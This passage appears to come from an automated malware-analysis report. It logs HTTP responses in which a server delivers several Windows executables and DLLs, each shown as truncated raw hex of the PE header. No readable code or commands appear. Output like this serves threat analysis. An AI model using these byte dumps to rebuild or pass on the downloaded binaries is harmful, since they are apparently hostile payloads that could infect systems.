bd 72 a0 3a cb a3 5d e1 8d fd 10 61 23 0e c6 21 b6 55 ef 9c cd 96 71 b7 e9 16 96 31 7e d9 bb 80 40 8a 9a 87 91 0f 58 92 28 9b e6 bb de e1 f4 f5 4c 6a f0 f2 94 44 dc c0 c3 b0 0f 41 fd 1c 92 ee cf d3 44 d2 77 a3 6b 01 73 c5 09 8b 45 26 fe 00 c7 4c 3a ec f1 9d f3 b2 fe 90 c8 69 f6 9b 9f c0 41 44 ae 6c ec ad 1d 3b c6 c8 38 cc be 56 e5 e2 9e 0f c1 50 ef 56 5a 6f ee 24 fa 7e 82 e4 3a 17 8b e1 0f 6b 90 1e 1f 9b b9 69 82 01 84 e1 aa 09 f6 a3 68 6f ae b9 93 81 0a a0 9d b1 6c 62 14 44 42 0e 4f 8d 0d 49 a4 76 a4 4b 73 22 04 5b e2 49 4f fa d0 58 ea 32 24 71 05 0e c8 0d 8b b2 ea 33 f4 a4 66 84 0d 16 12 a5 0f b9 8a 61 f9 c7 58 9e 3b d8 a9 ba 28 d5 e4 38 66 8d f1 6a 15 23 b6 6b d3 d7 67 e3 6
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:37:52 GMTContent-Type: application/octet-streamContent-Length: 342568Last-Modified: Tue, 03 Sep 2024 12:56:26 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d7077a-53a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 06 05 00 00 20 00 00 00 08 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 05 00 00 08 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 12 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 26 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 18 05 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 60 70 4e 04 37 b5 f5 bb b4 6e 9a 85 9e b0 e8 b4 51 c4 a6 b8 15 8b e1 2e c4 64 e0 65 ed a0 d1 24 5b a4 a2 ea ca 41 89 8e 42 b8 c0 99 c6 87 b4 f1 90 43 15 55 31 af 97 23 bf 5e 10 bb 87 1f f1 1d a1 0e 1e ca 35 7f 8f e3 0d 1c c9 8b 36 69 d8 bf 25 8b cf d8 c3 5e 45 61 39 19 12 5b b7 1e 1e e8 14 a6 84 63 74 ed 83 87 df 0f 71 96 e8 9e 16 5a 97 3b 16 0d 36 02 7a 8f 5b 5e b5 a7 58 c4 82 27 11 2f 96 fb 1a af f5 08 56 48 57 2c 99 9c 77 5d b9 b9 7e 35 d0 cf 22 91 4f cd 78 e4 c8 f2 32 1a 60 08 ae 83 c3 62 c1 8f 32 c4 58 aa 3e 3d 5c 1a 6c 1a 8a f9 b5 89 23 f5 b3 78 04 53 a6 1a 2c c9 7e 19 2c 22 fd 88 ac 7a 9a 3c 17 e9 ca 63 c2 5a e6 1a dc 2e 6d 25 7d 52 d5 e7 f7 a8 16 8e 3f 47 1c 2a 39 a1 58 f7 ac 89 b6 a5 73 24 93 11 d3 98 b1 fb d8 1b 96 1b f1 87 46 f9 4c fb f7 ae 9f 16 40 5c 7b c9 2e 4a bd 96 e2 82 7e 5c cb 54 ab 40 43 cb a0 96 1b 06 3a 11 fe 8a 17 ab 1d 8f e7 71 fe e7 fc 19 0b df 6e b6 f5 13 9a 1e 93 9
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:01 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:07 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:07 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:08 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:09 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:09 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 